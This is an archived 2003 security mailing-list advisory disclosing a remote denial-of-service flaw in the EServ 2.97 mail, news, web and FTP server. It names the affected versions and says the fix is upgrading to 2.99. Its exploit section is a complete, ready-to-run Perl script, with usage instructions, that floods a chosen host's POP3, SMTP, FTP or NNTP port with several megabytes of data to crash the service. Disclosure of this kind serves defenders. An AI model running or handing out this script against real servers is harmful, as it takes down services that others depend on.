Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnwatch: EServ/2.97 remote DoS

EServ/2.97 remote DoS

From: D4rkGr3y <grey_1999_at_mail.ru>
Date: Sat, 4 Jan 2003 05:01:41 -0800

#####################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
#####################################################*
#Product: EServ/2.97
#Authors: Etype Co. [www.eserv.ru]
#Vulnerable versions: up to v.2.97, may be 2.98
#Not vulnerable versions: v.2.99
#Vulnerability: remote DoS
#####################################################*

#Overview#--------------------------------------------------------------#
>From EServ's 'readme' file:
"Eserv/2.97 - mail, news, web, ftp and proxy server.
It includes:

- SMTP, POP3, NNTP -servers
- caching HTTP/FTP proxy
- HTTP server (maintaining virtual servers)
- FTP server (with download and upload resuming support)
- FTP-gate
- Socks5, Socks4 and 4a proxy
- TCP è UDP mapping proxy
- Finger-server"

#Problem#---------------------------------------------------------------#
We founded 4 bugs, that allows to kill EServ by sending data with a
very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,
NNTP - 5001216b. This is not buffer overflow, so it's impossible to use
this bugs for privelege escalation or something like this.

#Fix#--------------------------------------------------------------------#
Download new verion from www.eserv.ru. EServ/2.99 _is_not_vulnerable_.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
######################################################
#EServ/2.97 remote DoS xsploit
#Bugs founded in v.2.97 but I think that 2.98 is
#vulnerable too.
#################
#Usage: perl EServ.DoS.pl [host] [port] [service_type]
#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
#Example: perl EServ.DoS.pl localhost 110 pop
#################
#If something wrong or u wanna to discuss something,
#contact me: "D4rkGr3y" <grey_1999_at_mail.ru> icq: 540981
#######################################################
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";
print "\n\n";;
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
if ($param) {
$num = "4950001" if $param eq "pop";
$num = "4960000" if $param eq "smtp";
$num = "5005312" if $param eq "ftp";
$num = "5001215" if $param eq "nntp";
die "Error in params\n" if !$num;
print "Connecting...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket
error.\n";
print "OK\n";
$buf .= $data x $num;
print "Attacking...";
print $socket "$buf\n";
print "OK\n\n";
print "Vizit us at www.dhgroup.org";
close($socket);
} else {
  print "Error in Params.\n";
  print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
  print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
  print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
  exit;
}

#EOF

Best regards www.dhgroup.org
  D4rkGr3y icq 540981
Received on Jan 04 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]